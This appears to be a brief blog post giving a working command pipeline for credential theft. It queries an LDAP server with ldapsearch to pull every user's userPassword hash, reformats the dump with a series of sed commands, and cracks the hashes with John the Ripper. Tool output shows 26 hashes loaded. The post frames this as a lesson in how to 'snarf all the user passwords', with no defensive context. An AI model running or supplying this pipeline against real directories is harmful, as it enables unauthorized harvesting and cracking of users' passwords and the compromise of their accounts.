ldapsearch -x -D "cn=bindAcct,dc=domain" -w bindpass -h 6.6.6.6 -b ou=users,dc=domain -LLL "(objectClass=shadowAccount)" userPassword > dearjohn \ <- query
sed -i '/^$/d' dearjohn \ <- remove blank lines
sed -i 's/,ou=users,dc=domain//g' dearjohn \ <- strip the domain from the user dn
sed -i 's/dn:\ uid=//g' dearjohn \ <- remove the user dn
sed -i ':a;N;$!ba;s/\n/blast/g' dearjohn \ <- have fun with line breaks
sed -i 's/userPassword//g' dearjohn \ <- strip out attribute
sed -i 's/blast::\ /:/g' dearjohn \ <- format fun
sed -i 's/blast/\n/g' dearjohn \ <- bring the line breaks back
john dearjohn
Warning: only loading hashes of type "des", but also saw type "md5"
Use the "--format=md5" option to force loading hashes of that type instead
Loaded 26 password hashes with 26 different salts (Traditional DES [128/128 BS SSE2-16])
Remaining 25 password hashes with 25 different salts
...
...
...
and now you know how to connect to an ldap server and snarf all the user passwords, get them formatted for
john the ripper using sed and then going about to crack them. the fun.
No comments:
Post a Comment